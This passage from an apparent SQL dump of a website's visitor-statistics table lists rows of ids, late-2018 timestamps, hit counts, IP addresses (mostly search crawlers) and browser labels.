,1,0,0,'5.45.207.79','other'),(360794,1546038342,3,3,0,0,'5.45.207.19','other'),(360795,1546038713,1,1,0,0,'157.55.39.231','other'),(360796,1546038849,1,1,0,0,'66.249.66.44','chrome'),(360797,1546039158,1,1,0,0,'178.154.244.11','other'),(360798,1546039323,7,7,0,0,'216.244.66.241','other'),(360799,1546039650,2,2,0,0,'140.227.202.162','chrome'),(360800,1546039763,1,1,0,0,'69.12.66.196','chrome'),(360801,1546040359,2,2,0,0,'66.249.66.156','chrome'),(360803,1546040388,1,1,0,0,'66.249.66.152','chrome'),(360804,1546040591,1,1,0,0,'46.229.168.137','other'),(360805,1546040628,1,1,0,0,'5.45.207.79','other'),(360806,1546040645,1,1,0,0,'66.249.66.154','chrome'),(360807,1546041116,1,1,0,0,'8.29.198.25','other'),(360808,1546041459,1,1,0,0,'194.44.253.86','chrome'),(360809,1546041882,1,1,0,0,'46.229.168.129','other'),(360810,1546041887,1,1,0,0,'46.229.168.142','other'),(360811,1546042121,1,1,0,0,'178.154.244.11','other'),(360812,1546042212,1,1,0,0,'8.29.198.25','other'),(360813,1546042306,6,6,0,0,'216.244.66.241','other'),(360814,1546042533,2,2,0,0,'141.8.142.103','other'),(360815,1546042591,1,1,0,0,'5.45.207.19','other'),(360816,1546042677,1,1,0,0,'95.163.255.68','other'),(360817,1546042680,1,1,0,0,'95.163.255.63','other'),(360818,1546042750,1,1,0,0,'157.55.39.116','other'),(360819,1546042799,1,1,0,0,'157.55.39.149','other'),(360820,1546043226,1,1,0,0,'216.244.66.241','other'),(360821,1546043355,302,302,0,0,'107.150.59.98','other'),(360822,1546043357,158,158,0,0,'79.143.185.25','other'),(360823,1546044203,2,2,0,0,'157.55.39.232','other'),(360824,1546044261,265,265,0,0,'79.143.185.25','other'),(360825,1546044279,1,1,0,0,'5.45.207.79','other'),(360826,1546044325,1,1,0,0,'5.45.207.19','other'),(360827,1546044354,32,32,0,0,'85.10.207.195','other'),(360828,1546044819,2,2,0,0,'66.249.66.155','chrome'),(360829,1546044820,1,1,0,0,'66.249.66.154','chrome'),(360830,1546044997,1,1,0,0,'185.100.87.206','other'),(360831,1546045064,2,2,0,0,'66.249.66.152','chrome'),(360832,1546045124,5,5,0,0,'216.244.66.241','other'),(360833,1546045162,32,32,0,0,'79.143.185.25','other'),(360834,1546045748,1,1,0,0,'66.249.66.155','chrome'),(360835,1546045856,1,1,0,0,'46.229.168.143','other'),(360836,1546045987,1,1,0,0,'46.229.168.141','other'),(360837,1546046145,1,1,0,0,'216.244.66.241','other'),(360838,1546046603,1,1,0,0,'5.45.207.19','other'),(360839,1546046771,1,1,0,0,'87.250.224.47','other'),(360840,1546046919,1,1,0,0,'66.249.66.157','chrome'),(360841,1546046920,1,1,0,0,'66.249.66.152','chrome'),(360842,1546047847,1,1,0,0,'37.9.113.103','other'),(360843,1546048035,5,5,0,0,'216.244.66.241','other'),(360844,1546048545,1,1,0,0,'87.250.224.65','other'),(360845,1546048661,1,1,0,0,'178.154.171.24','other'),(360846,1546048694,3,3,0,0,'213.180.203.9','other'),(360847,1546048952,3,3,0,0,'37.9.113.103','other'),(360848,1546049072,3,3,0,0,'5.45.207.79','other'),(360849,1546049190,3,3,0,0,'37.9.113.20','other'),(360850,1546049224,1,1,0,0,'141.8.142.103','other'),(360851,1546049230,2,2,0,0,'216.244.66.241','other'),(360852,1546049239,1,1,0,0,'87.250.224.47','other'),(360853,1546049679,2,2,0,0,'87.250.224.65','other'),(360854,1546050226,1,1,0,0,'157.55.39.56','other'),(360855,1546050561,1,1,0,0,'66.249.66.157','chrome'),(360857,1546050879,4,4,0,0,'216.244.66.241','other'),(360858,1546050995,2,2,0,0,'34.220.141.205','chrome'),(360859,1546051325,1,1,0,0,'157.55.39.56','other'),(360860,1546051566,1,1,0,0,'66.249.66.57','chrome'),(360862,1546051971,1,1,0,0,'8.29.198.26','other'),(360863,1546052031,2,2,0,0,'216.244.66.241','other'),(360864,1546052220,1,1,0,0,'157.55.39.232','other'),(360865,1546052310,1,1,0,0,'157.55.39.231','other'),(360866,1546052446,1,1,0,0,'66.249.66.40','chrome'),(360867,1546052898,1,1,0,0,'37.9.113.103','other'),(360868,1546052976,1,1,0,0,'157.55.39.56','other'),(360869,1546053047,1,1,0,0,'8.29.198.25','other'),(360870,1546053531,1,1,0,0,'46.229.168.150','other'),(360871,1546053809,1,1,0,0,'66.249.66.40','chrome'),(360872,1546053908,3,3,0,0,'216.244.66.241','other'),(360873,1546054216,1,1,0,0,'66.249.66.154','chrome'),(360874,1546054618,1,1,0,0,'40.77.167.65','other'),(360875,1546054789,1,1,0,0,'66.249.66.157','chrome'),(360877,1546054804,1,1,0,0,'66.249.66.155','chrome'),(360878,1546054805,1,1,0,0,'66.249.66.156','chrome'),(360879,1546055169,2,2,0,0,'216.244.66.241','other'),(360880,1546055715,1,1,0,0,'46.229.168.149','other'),(360881,1546055717,1,1,0,0,'46.229.168.130','other'),(360882,1546055780,1,1,0,0,'66.249.66.155','chrome'),(360883,1546055781,1,1,0,0,'66.249.66.154','chrome'),(360884,1546056685,6,6,0,0,'216.244.66.241','other'),(360885,1546057189,1,1,0,0,'40.77.167.65','other'),(360886,1546057508,1,1,0,0,'157.55.39.231','other'),(360887,1546057630,3,3,0,0,'95.216.41.162','other'),(360888,1546057913,2,2,0,0,'87.250.224.47','other'),(360889,1546057963,1,1,0,0,'141.8.142.103','other'),(360890,1546058043,2,2,0,0,'37.9.113.20','other'),(360891,1546058168,1,1,0,0,'216.244.66.241','other'),(360892,1546058317,1,1,0,0,'213.180.203.40','other'),(360893,1546058330,1,1,0,0,'141.8.142.38','other'),(360894,1546058349,1,1,0,0,'178.154.171.69','other'),(360895,1546058417,1,1,0,0,'141.8.132.16','other'),(360896,1546058556,1,1,0,0,'141.8.183.23','other'),(360897,1546058560,1,1,0,0,'141.8.142.144','other'),(360898,1546058907,1,1,0,0,'87.250.224.65','other'),(360899,1546059063,1,1,0,0,'178.154.171.24','other'),(360900,1546059116,1,1,0,0,'66.102.9.22','chrome'),(360901,1546059440,2,2,0,0,'95.213.141.126','opera'),(360902,1546059487,1,1,0,0,'66.102.9.25','chrome'),(360904,1546059558,2,2,0,0,'216.244.66.241','other'),(360905,1546059834,1,1,0,0,'95.108.181.54','other'),(360906,1546060149,1,1,0,0,'40.77.167.65','other'),(360907,1546060153,3,3,0,0,'157.55.39.116','other'),(360908,1546060158,2,2,0,0,'157.55.39.231','other'),(360909,1546060684,1,1,0,0,'66.249.66.40','chrome'),(360910,1546060992,1,1,0,0,'98.193.59.249','chrome'),(360911,1546061293,1,1,0,0,'141.8.142.103','other'),(360912,1546061322,1,1,0,0,'157.55.39.231','other'),(360913,1546062147,1,1,0,0,'66.249.66.154','chrome'),(360914,1546062201,1,1,0,0,'66.249.66.44','chrome'),(360915,1546062510,5,5,0,0,'216.244.66.241','other'),(360916,1546062638,1,1,0,0,'5.45.207.79','other'),(360917,1546062817,1,1,0,0,'8.29.198.26','other'),(360918,1546063135,1,1,0,0,'66.249.66.155','chrome'),(360919,1546063136,1,1,0,0,'66.249.66.152','chrome'),(360920,1546063204,1,1,0,0,'46.229.168.148','other'),(360921,1546063611,2,2,0,0,'185.220.101.30','other'),(360922,1546063623,1,1,0,0,'46.229.168.136','other'),(360923,1546063663,2,2,0,0,'216.244.66.241','other'),(360924,1546063877,1,1,0,0,'8.29.198.26','other'),(360925,1546063931,1,1,0,0,'46.229.168.130','other'),(360926,1546064061,1,1,0,0,'46.229.168.149','other'),(360927,1546064156,1,1,0,0,'207.46.13.221','other'),(360928,1546064241,1,1,0,0,'66.249.66.61','chrome'),(360929,1546064242,1,1,0,0,'66.249.66.40','chrome'),(360930,1546064604,2,2,0,0,'66.249.66.156','chrome'),(360931,1546064605,1,1,0,0,'66.249.66.152','chrome'),(360932,1546065045,1,1,0,0,'66.249.66.157','chrome'),(360933,1546065375,2,2,0,0,'5.45.207.19','other'),(360934,1546065462,7,7,0,0,'216.244.66.241','other'),(360935,1546065467,2,2,0,0,'91.196.178.83','chrome'),(360936,1546065719,1,1,0,0,'157.55.39.232','other'),(360937,1546065974,1,1,0,0,'46.229.168.134','other'),(360938,1546066424,1,1,0,0,'5.45.207.79','other'),(360939,1546066929,1,1,0,0,'216.244.66.241','other'),(360940,1546066949,1,1,0,0,'141.8.142.103','other'),(360941,1546066951,1,1,0,0,'66.249.66.152','chrome'),(360942,1546067398,1,1,0,0,'207.46.13.193','other'),(360943,1546067412,1,1,0,0,'66.249.66.59','chrome'),(360944,1546067413,1,1,0,0,'66.249.66.40','chrome'),(360945,1546067414,1,1,0,0,'66.249.66.57','chrome'),(360947,1546067632,3,3,0,0,'91.196.178.134','chrome'),(360948,1546067796,5,5,0,0,'5.45.207.19','other'),(360949,1546068045,2,2,0,0,'5.45.207.79','other'),(360950,1546068330,1,1,0,0,'46.229.168.134','other'),(360951,1546068332,1,1,0,0,'216.244.66.241','other'),(360952,1546068339,1,1,0,0,'178.154.244.11','other'),(360953,1546068458,1,1,0,0,'66.249.66.156','chrome'),(360954,1546068690,1,1,0,0,'66.249.66.157','chrome'),(360955,1546068691,1,1,0,0,'66.249.66.152','chrome'),(360956,1546069362,1,1,0,0,'66.249.66.155','chrome'),(360958,1546070095,1,1,0,0,'46.229.168.149','other'),(360959,1546070353,1,1,0,0,'157.55.39.180','other'),(360960,1546070758,1,1,0,0,'46.229.168.138','other'),(360961,1546071096,10,10,0,0,'216.244.66.241','other'),(360962,1546071594,1,1,0,0,'66.249.66.57','chrome'),(360963,1546071595,1,1,0,0,'66.249.66.40','chrome'),(360964,1546071885,2,2,0,0,'95.132.51.248','firefox'),(360965,1546072367,1,1,0,0,'46.229.168.138','other'),(360966,1546072371,1,1,0,0,'46.229.168.150','other'),(360967,1546072402,1,1,0,0,'66.249.66.155','chrome'),(360969,1546072501,2,2,0,0,'91.196.178.83','chrome'),(360970,1546072554,1,1,0,0,'37.53.123.48','chrome'),(360971,1546073448,3,3,0,0,'91.196.178.83','chrome'),(360972,1546073478,1,1,0,0,'66.249.66.57','chrome'),(360973,1546073666,1,1,0,0,'8.29.198.26','other'),(360974,1546073816,2,2,0,0,'66.249.66.152','chrome'),(360975,1546074106,4,4,0,0,'216.244.66.241','other'),(360976,1546074120,1,1,0,0,'47.92.135.145','other'),(360977,1546074705,1,1,0,0,'8.29.198.26','other'),(360978,1546074940,1,1,0,0,'157.55.39.158','other'),(360979,1546075230,1,1,0,0,'66.249.66.40','chrome'),(360980,1546075346,1,1,0,0,'209.17.97.34','other'),(360981,1546076059,1,1,0,0,'130.180.217.51','chrome'),(360982,1546076073,1,1,0,0,'46.229.168.150','other'),(360983,1546076287,1,1,0,0,'66.102.9.40','chrome'),(360984,1546076529,1,1,0,0,'66.249.66.156','chrome'),(360985,1546076760,1,1,0,0,'95.163.255.177','other'),(360986,1546076761,1,1,0,0,'95.163.255.191','other'),(360987,1546076764,1,1,0,0,'95.163.255.175','other'),(360988,1546076873,1,1,0,0,'95.163.255.156','other'),(360989,1546076875,1,1,0,0,'95.163.255.196','other'),(360990,1546076882,5,5,0,0,'216.244.66.241','other'),(360991,1546077044,1,1,0,0,'46.229.168.145','other'),(360992,1546077147,1,1,0,0,'46.229.168.147','other'),(360993,1546077177,4,4,0,0,'91.196.178.83','chrome'),(360994,1546077492,1,1,0,0,'66.249.66.156','chrome'),(360995,1546077493,1,1,0,0,'66.249.66.152','chrome'),(360996,1546077624,1,1,0,0,'66.249.66.154','chrome'),(360997,1546077657,1,1,0,0,'66.249.66.42','chrome'),(360998,1546078093,1,1,0,0,'46.229.168.132','other'),(360999,1546078161,1,1,0,0,'95.163.255.151','other'),(361000,1546078720,1,1,0,0,'87.250.224.47','other'),(361001,1546078728,1,1,0,0,'213.180.203.9','other'),(361002,1546078770,1,1,0,0,'95.108.181.54','other'),(361003,1546078975,1,1,0,0,'46.229.168.151','other'),(361004,1546079069,2,2,0,0,'91.196.178.131','firefox'),(361005,1546079402,1,1,0,0,'37.9.113.20','other'),(361006,1546079515,3,3,0,0,'141.8.142.103','other'),(361007,1546079787,1,1,0,0,'5.45.207.19','other'),(361008,1546079812,2,2,0,0,'216.244.66.241','other'),(361009,1546080015,1,1,0,0,'178.154.171.69','other'),(361010,1546080039,2,2,0,0,'87.250.224.47','other'),(361011,1546080041,1,1,0,0,'5.255.253.38','other'),(361012,1546080075,1,1,0,0,'87.250.224.118','other'),(361013,1546080093,1,1,0,0,'178.154.244.11','other'),(361014,1546080202,1,1,0,0,'157.55.39.158','other'),(361015,1546080214,1,1,0,0,'178.154.244.65','other'),(361016,1546080249,1,1,0,0,'5.45.207.79','other'),(361017,1546080254,1,1,0,0,'95.108.213.4','other'),(361018,1546080535,1,1,0,0,'95.163.255.93','other'),(361019,1546080702,1,1,0,0,'40.77.167.72','other'),(361020,1546080770,1,1,0,0,'141.8.142.191','other'),(361021,1546080793,1,1,0,0,'216.244.66.241','other'),(361022,1546080884,1,1,0,0,'5.45.207.19','other'),(361023,1546081240,1,1,0,0,'46.229.168.134','other'),(361024,1546081881,1,1,0,0,'66.249.66.199','chrome'),(361025,1546081882,2,2,0,0,'66.249.66.154','chrome'),(361026,1546081909,13,13,0,0,'66.249.66.152','chrome'),(361027,1546081929,1,1,0,0,'66.249.66.218','chrome'),(361028,1546082565,2,2,0,0,'91.209.11.236','other'),(361029,1546082680,7,7,0,0,'216.244.66.241','other'),(361030,1546082947,1,1,0,0,'82.145.208.210','other'),(361031,1546082967,1,1,0,0,'157.55.39.158','other'),(361032,1546083289,1,1,0,0,'66.249.66.156','chrome'),(361033,1546083290,2,2,0,0,'66.249.66.152','chrome'),(361034,1546083304,1,1,0,0,'66.249.66.157','chrome'),(361035,1546083420,1,1,0,0,'82.145.208.134','other'),(361036,1546084102,1,1,0,0,'95.163.255.183','other'),(361037,1546084151,1,1,0,0,'37.53.123.48','chrome'),(361038,1546084321,1,1,0,0,'95.163.255.99','other'),(361039,1546084396,2,2,0,0,'46.133.24.102','chrome'),(361040,1546084402,1,1,0,0,'46.229.168.154','other'),(361041,1546084505,1,1,0,0,'157.55.39.158','other'),(361042,1546084506,1,1,0,0,'8.29.198.26','other'),(361043,1546084533,2,2,0,0,'5.188.211.26','msie'),(361044,1546084540,1,1,0,0,'216.244.66.241','other'),(361045,1546085321,1,1,0,0,'180.76.15.17','other'),(361046,1546085534,9,9,0,0,'216.244.66.241','other'),(361047,1546085546,1,1,0,0,'8.29.198.25','other'),(361048,1546085605,1,1,0,0,'66.249.66.40','chrome'),(361049,1546086437,2,2,0,0,'216.244.66.241','other'),(361050,1546086505,1,1,0,0,'46.229.168.151','other'),(361051,1546086507,1,1,0,0,'46.229.168.148','other'),(361052,1546086935,2,2,0,0,'157.55.39.158','other'),(361053,1546087320,1,1,0,0,'180.76.15.163','other'),(361054,1546087321,1,1,0,0,'180.76.15.19','other'),(361055,1546087544,1,1,0,0,'207.46.13.111','other'),(361056,1546087564,1,1,0,0,'46.229.168.143','other'),(361057,1546087924,1,1,0,0,'66.249.66.154','chrome'),(361058,1546087935,1,1,0,0,'46.229.168.136','other'),(361059,1546088027,1,1,0,0,'95.163.255.161','other'),(361060,1546088224,1,1,0,0,'157.55.39.88','other'),(361061,1546088344,1,1,0,0,'95.163.255.173','other'),(361062,1546088379,6,6,0,0,'216.244.66.241','other'),(361063,1546088382,1,1,0,0,'46.229.168.141','other'),(361064,1546088496,1,1,0,0,'95.163.255.175','other'),(361065,1546088709,1,1,0,0,'157.55.39.158','other'),(361066,1546089384,1,1,0,0,'46.229.168.150','other'),(361067,1546089803,1,1,0,0,'157.55.39.158','other'),(361068,1546090042,1,1,0,0,'141.8.142.144','other'),(361069,1546090263,1,1,0,0,'66.249.66.157','chrome'),(361070,1546090300,2,2,0,0,'5.45.207.79','other'),(361071,1546090347,1,1,0,0,'87.250.224.118','other'),(361072,1546090471,1,1,0,0,'37.9.113.103','other'),(361073,1546090476,3,3,0,0,'95.108.181.54','other'),(361074,1546090581,2,2,0,0,'87.250.224.107','other'),(361075,1546090626,2,2,0,0,'93.79.100.219','firefox'),(361076,1546090629,2,2,0,0,'141.8.183.23','other'),(361077,1546090681,1,1,0,0,'141.8.142.191','other'),(361078,1546090698,1,1,0,0,'5.45.207.19','other'),(361079,1546090702,1,1,0,0,'95.108.213.4','other'),(361080,1546090785,2,2,0,0,'178.154.200.48','other'),(361081,1546090958,2,2,0,0,'87.250.224.64','other'),(361082,1546090960,2,2,0,0,'141.8.142.38','other'),(361083,1546090963,1,1,0,0,'141.8.142.108','other'),(361084,1546090964,2,2,0,0,'91.196.178.132','chrome'),(361085,1546090991,1,1,0,0,'66.249.66.156','chrome'),(361087,1546090996,1,1,0,0,'66.249.66.42','chrome'),(361088,1546091088,2,2,0,0,'46.211.109.23','chrome'),(361089,1546091249,10,10,0,0,'216.244.66.241','other'),(361090,1546091413,2,2,0,0,'37.9.113.148','other'),(361091,1546091503,2,2,0,0,'141.8.142.144','other'),(361092,1546091600,4,4,0,0,'178.154.244.11','other'),(361093,1546091607,1,1,0,0,'95.108.213.4','other'),(361094,1546091725,1,1,0,0,'178.154.171.30','other'),(361095,1546091779,1,1,0,0,'95.108.181.75','other'),(361096,1546091845,1,1,0,0,'95.108.181.54','other'),(361097,1546091848,1,1,0,0,'213.180.203.40','other'),(361098,1546091868,1,1,0,0,'87.250.224.47','other'),(361099,1546091873,2,2,0,0,'87.250.224.65','other'),(361100,1546091949,1,1,0,0,'178.154.171.17','other'),(361101,1546091988,1,1,0,0,'66.249.66.156','chrome'),(361102,1546091989,1,1,0,0,'66.249.66.154','chrome'),(361103,1546091998,1,1,0,0,'46.229.168.154','other'),(361104,1546092097,2,2,0,0,'178.154.171.27','other'),(361105,1546092111,1,1,0,0,'178.154.171.69','other'),(361106,1546092143,1,1,0,0,'5.45.207.19','other'),(361107,1546092176,1,1,0,0,'95.108.181.83','other'),(361108,1546092184,1,1,0,0,'141.8.142.103','other'),(361109,1546092258,2,2,0,0,'87.250.224.107','other'),(361110,1546092260,1,1,0,0,'216.244.66.241','other'),(361111,1546092301,2,2,0,0,'178.154.244.65','other'),(361112,1546092484,2,2,0,0,'91.124.182.170','firefox'),(361113,1546092535,2,2,0,0,'141.8.183.22','other'),(361114,1546092555,1,1,0,0,'37.9.113.148','other'),(361115,1546092720,1,1,0,0,'213.180.203.17','other'),(361116,1546092727,1,1,0,0,'141.8.142.38','other'),(361117,1546092729,1,1,0,0,'87.250.224.118','other'),(361118,1546092860,1,1,0,0,'178.154.171.24','other'),(361119,1546092901,1,1,0,0,'87.250.224.47','other'),(361120,1546092989,1,1,0,0,'37.9.113.103','other'),(361121,1546093009,1,1,0,0,'46.229.168.141','other'),(361122,1546093011,1,1,0,0,'46.229.168.140','other'),(361123,1546093025,1,1,0,0,'141.8.142.144','other'),(361124,1546093150,1,1,0,0,'95.163.255.94','other'),(361125,1546093193,2,2,0,0,'216.244.66.241','other'),(361126,1546093200,1,1,0,0,'95.108.181.75','other'),(361127,1546093202,1,1,0,0,'213.180.203.40','other'),(361128,1546093735,1,1,0,0,'207.46.13.111','other'),(361129,1546093796,1,1,0,0,'87.250.224.107','other'),(361130,1546093894,1,1,0,0,'46.229.168.138','other'),(361131,1546093989,1,1,0,0,'66.249.66.42','chrome'),(361132,1546094112,1,1,0,0,'95.163.255.183','other'),(361133,1546094166,5,5,0,0,'216.244.66.241','other'),(361134,1546094496,1,1,0,0,'95.108.213.4','other'),(361135,1546094566,1,1,0,0,'46.229.168.129','other'),(361136,1546094568,1,1,0,0,'46.229.168.143','other'),(361137,1546094613,1,1,0,0,'66.249.66.154','chrome'),(361138,1546094923,1,1,0,0,'66.249.66.156','chrome'),(361139,1546094924,1,1,0,0,'66.249.66.152','chrome'),(361140,1546094981,3,3,0,0,'157.55.39.158','other'),(361141,1546095351,1,1,0,0,'8.29.198.26','other'),(361142,1546095411,2,2,0,0,'91.196.178.67','firefox'),(361143,1546095699,1,1,0,0,'95.163.255.170','other'),(361144,1546096364,1,1,0,0,'66.249.66.155','chrome'),(361145,1546096365,1,1,0,0,'66.249.66.152','chrome'),(361146,1546096374,1,1,0,0,'8.29.198.25','other'),(361147,1546096481,1,1,0,0,'180.76.15.161','other'),(361148,1546097006,1,1,0,0,'66.249.66.154','chrome'),(361149,1546097012,3,3,0,0,'216.244.66.241','other'),(361150,1546097066,1,1,0,0,'66.249.66.42','chrome'),(361151,1546097326,1,1,0,0,'46.229.168.137','other'),(361152,1546097444,1,1,0,0,'157.55.39.88','other'),(361153,1546097742,1,1,0,0,'5.255.253.16','other'),(361154,1546097931,1,1,0,0,'216.244.66.241','other'),(361155,1546097959,1,1,0,0,'66.249.66.152','chrome'),(361156,1546098071,1,1,0,0,'95.108.181.75','other'),(361157,1546098360,1,1,0,0,'66.249.66.154','chrome'),(361158,1546098466,1,1,0,0,'46.229.168.147','other'),(361159,1546098481,1,1,0,0,'180.76.15.160','other'),(361160,1546098482,1,1,0,0,'180.76.15.136','other'),(361161,1546098623,1,1,0,0,'141.8.142.38','other'),(361162,1546098627,1,1,0,0,'178.154.171.69','other'),(361163,1546099148,1,1,0,0,'46.229.168.133','other'),(361164,1546099911,7,7,0,0,'216.244.66.241','other'),(361165,1546100430,1,1,0,0,'46.229.168.138','other'),(361166,1546100546,1,1,0,0,'40.77.167.63','other'),(361167,1546100657,1,1,0,0,'178.154.244.11','other'),(361168,1546100891,1,1,0,0,'216.244.66.241','other'),(361169,1546101083,1,1,0,0,'5.45.207.79','other'),(361170,1546101769,1,1,0,0,'87.250.224.47','other'),(361171,1546102232,2,2,0,0,'178.154.244.11','other'),(361172,1546102302,3,3,0,0,'5.45.207.79','other'),(361173,1546102607,2,2,0,0,'5.45.207.19','other'),(361174,1546102868,1,1,0,0,'46.229.168.136','other'),(361175,1546102870,1,1,0,0,'46.229.168.148','other'),(361176,1546102963,4,4,0,0,'216.244.66.241','other'),(361177,1546103150,2,2,0,0,'46.211.133.210','chrome'),(361178,1546104311,1,1,0,0,'66.249.66.152','chrome'),(361179,1546104791,1,1,0,0,'46.229.168.129','other'),(361180,1546104984,1,1,0,0,'207.46.13.49','other'),(361181,1546105255,1,1,0,0,'95.163.255.189','other'),(361182,1546105422,1,1,0,0,'66.249.66.155','chrome'),(361183,1546105423,1,1,0,0,'66.249.66.154','chrome'),(361184,1546105471,1,1,0,0,'54.208.102.37','other'),(361185,1546105473,1,1,0,0,'107.21.1.8','other'),(361186,1546105713,5,5,0,0,'216.244.66.241','other'),(361187,1546105724,2,2,0,0,'157.55.39.88','other'),(361188,1546105799,1,1,0,0,'207.46.13.111','other'),(361189,1546106202,1,1,0,0,'8.29.198.26','other'),(361190,1546106520,1,1,0,0,'66.249.66.156','chrome'),(361191,1546107192,1,1,0,0,'66.249.66.61','chrome'),(361192,1546107194,1,1,0,0,'66.249.66.42','chrome'),(361193,1546107210,1,1,0,0,'8.29.198.25','other'),(361194,1546107301,1,1,0,0,'95.163.255.92','other'),(361195,1546108343,1,1,0,0,'46.211.109.92','chrome'),(361196,1546108544,1,1,0,0,'5.45.207.19','other'),(361197,1546108616,1,1,0,0,'66.249.66.156','chrome'),(361198,1546108777,2,2,0,0,'216.244.66.241','other'),(361199,1546109142,1,1,0,0,'95.163.255.95','other'),(361200,1546109282,2,2,0,0,'46.211.119.185','chrome'),(361201,1546109348,1,1,0,0,'95.163.255.99','other'),(361202,1546109540,1,1,0,0,'54.36.148.195','other'),(361203,1546109610,1,1,0,0,'54.36.149.44','other'),(361204,1546109633,1,1,0,0,'54.36.148.50','other'),(361205,1546109646,1,1,0,0,'54.36.148.99','other'),(361206,1546109749,1,1,0,0,'54.36.149.21','other'),(361207,1546109770,1,1,0,0,'86.56.15.186','other'),(361208,1546109780,1,1,0,0,'207.46.13.111','other'),(361209,1546109884,1,1,0,0,'54.36.149.102','other'),(361210,1546109993,1,1,0,0,'54.36.149.95','other'),(361211,1546110044,1,1,0,0,'54.36.148.152','other'),(361212,1546110187,1,1,0,0,'54.36.148.48','other'),(361213,1546110197,1,1,0,0,'54.36.149.39','other'),(361214,1546110212,1,1,0,0,'91.196.178.189','chrome'),(361215,1546110259,1,1,0,0,'54.36.149.42','other'),(361216,1546110306,1,1,0,0,'46.211.119.185','chrome'),(361217,1546110347,1,1,0,0,'37.9.113.148','other'),(361218,1546110412,1,1,0,0,'54.36.149.18','other'),(361219,1546110413,1,1,0,0,'216.244.66.241','other'),(361220,1546110532,1,1,0,0,'54.36.148.57','other'),(361221,1546111056,1,1,0,0,'95.163.255.182','other'),(361222,1546111076,1,1,0,0,'54.36.148.152','other'),(361223,1546111114,1,1,0,0,'46.229.168.138','other'),(361224,1546111227,1,1,0,0,'54.36.149.104','other'),(361225,1546111293,1,1,0,0,'157.55.39.88','other'),(361226,1546111385,1,1,0,0,'54.36.148.243','other'),(361227,1546111394,1,1,0,0,'54.36.148.37','other'),(361228,1546111602,1,1,0,0,'54.36.148.164','other'),(361229,1546111646,1,1,0,0,'54.36.149.64','other'),(361230,1546111668,3,3,0,0,'216.244.66.241','other'),(361231,1546111766,1,1,0,0,'95.163.255.188','other'),(361232,1546111791,1,1,0,0,'95.163.255.156','other'),(361233,1546111918,1,1,0,0,'46.211.119.185','chrome'),(361234,1546112069,1,1,0,0,'54.36.148.179','other'),(361235,1546112091,1,1,0,0,'95.163.255.183','other'),(361236,1546112231,2,2,0,0,'207.46.13.49','other'),(361237,1546112368,2,2,0,0,'178.154.244.11','other'),(361238,1546112665,1,1,0,0,'54.36.148.97','other'),(361239,1546112769,1,1,0,0,'157.55.39.88','other'),(361240,1546112777,1,1,0,0,'54.36.148.132','other'),(361241,1546112986,4,4,0,0,'46.150.65.4','chrome'),(361242,1546113032,2,2,0,0,'216.244.66.241','other'),(361243,1546113039,1,1,0,0,'66.249.66.59','chrome'),(361244,1546113041,1,1,0,0,'66.249.66.42','chrome'),(361245,1546113159,4,4,0,0,'141.8.142.103','other'),(361246,1546113245,2,2,0,0,'46.211.44.145','chrome'),(361247,1546113520,4,4,0,0,'178.154.244.11','other'),(361248,1546113559,2,2,0,0,'37.9.113.20','other'),(361249,1546113568,3,3,0,0,'5.45.207.19','other'),(361250,1546113674,1,1,0,0,'54.36.148.41','other'),(361251,1546113740,2,2,0,0,'82.145.208.35','other'),(361252,1546113822,1,1,0,0,'54.36.148.229','other'),(361253,1546113858,2,2,0,0,'213.180.203.9','other'),(361254,1546114012,1,1,0,0,'54.36.149.102','other'),(361255,1546114066,1,1,0,0,'87.250.224.47','other'),(361256,1546114068,1,1,0,0,'40.77.167.63','other'),(361257,1546114199,1,1,0,0,'46.229.168.154','other'),(361258,1546114268,1,1,0,0,'46.229.168.144','other'),(361259,1546114327,1,1,0,0,'54.36.148.152','other'),(361260,1546114398,1,1,0,0,'37.9.113.148','other'),(361261,1546114470,3,3,0,0,'5.45.207.79','other'),(361262,1546114503,1,1,0,0,'157.55.39.88','other'),(361263,1546114526,1,1,0,0,'188.234.37.34','chrome'),(361264,1546114529,1,1,0,0,'46.147.176.231','chrome'),(361265,1546114597,3,3,0,0,'216.244.66.241','other'),(361266,1546114636,4,4,0,0,'178.154.244.11','other'),(361267,1546114651,1,1,0,0,'5.45.207.19','other'),(361268,1546114721,1,1,0,0,'54.36.149.84','other'),(361269,1546114922,1,1,0,0,'46.229.168.138','other'),(361270,1546114998,1,1,0,0,'66.249.66.154','chrome'),(361271,1546115056,1,1,0,0,'46.229.168.145','other'),(361272,1546115214,1,1,0,0,'54.36.148.106','other'),(361273,1546115242,1,1,0,0,'141.8.142.103','other'),(361274,1546115287,1,1,0,0,'54.36.148.187','other'),(361275,1546115332,1,1,0,0,'54.36.149.90','other'),(361276,1546115462,1,1,0,0,'54.36.148.93','other'),(361277,1546115546,1,1,0,0,'66.249.66.57','chrome'),(361278,1546115547,1,1,0,0,'66.249.66.44','chrome'),(361279,1546115672,1,1,0,0,'66.249.66.152','chrome'),(361280,1546115911,1,1,0,0,'95.108.213.4','other'),(361281,1546115979,1,1,0,0,'54.36.148.186','other'),(361282,1546116079,1,1,0,0,'95.163.255.176','other'),(361283,1546116094,1,1,0,0,'54.36.148.203','other'),(361284,1546116240,1,1,0,0,'95.163.255.167','other'),(361285,1546116368,1,1,0,0,'54.36.149.44','other'),(361286,1546116586,1,1,0,0,'46.211.129.120','chrome'),(361287,1546116622,2,2,0,0,'157.55.39.88','other'),(361288,1546116721,1,1,0,0,'54.36.148.162','other'),(361289,1546116765,1,1,0,0,'66.249.66.155','chrome'),(361291,1546116842,1,1,0,0,'69.58.0.174','chrome'),(361292,1546116843,1,1,0,0,'176.193.36.87','chrome'),(361293,1546116879,1,1,0,0,'66.249.66.157','chrome'),(361294,1546116881,1,1,0,0,'66.249.66.154','chrome'),(361295,1546117022,1,1,0,0,'54.36.148.123','other'),(361296,1546117054,1,1,0,0,'8.29.198.25','other'),(361297,1546117279,1,1,0,0,'54.36.149.51','other'),(361298,1546117411,1,1,0,0,'66.249.66.152','chrome'),(361299,1546117561,1,1,0,0,'66.249.66.40','chrome'),(361300,1546117624,1,1,0,0,'54.36.148.167','other'),(361301,1546117656,3,3,0,0,'216.244.66.241','other'),(361302,1546117845,1,1,0,0,'66.249.66.155','chrome'),(361303,1546117846,1,1,0,0,'66.249.66.156','chrome'),(361304,1546117958,1,1,0,0,'54.36.148.206','other'),(361305,1546117991,1,1,0,0,'46.229.168.154','other'),(361306,1546118047,1,1,0,0,'8.29.198.26','other'),(361307,1546118140,1,1,0,0,'95.134.116.83','chrome'),(361308,1546118147,1,1,0,0,'157.55.39.88','other'),(361309,1546118341,1,1,0,0,'54.36.148.189','other'),(361310,1546118372,1,1,0,0,'54.36.149.107','other'),(361311,1546118509,1,1,0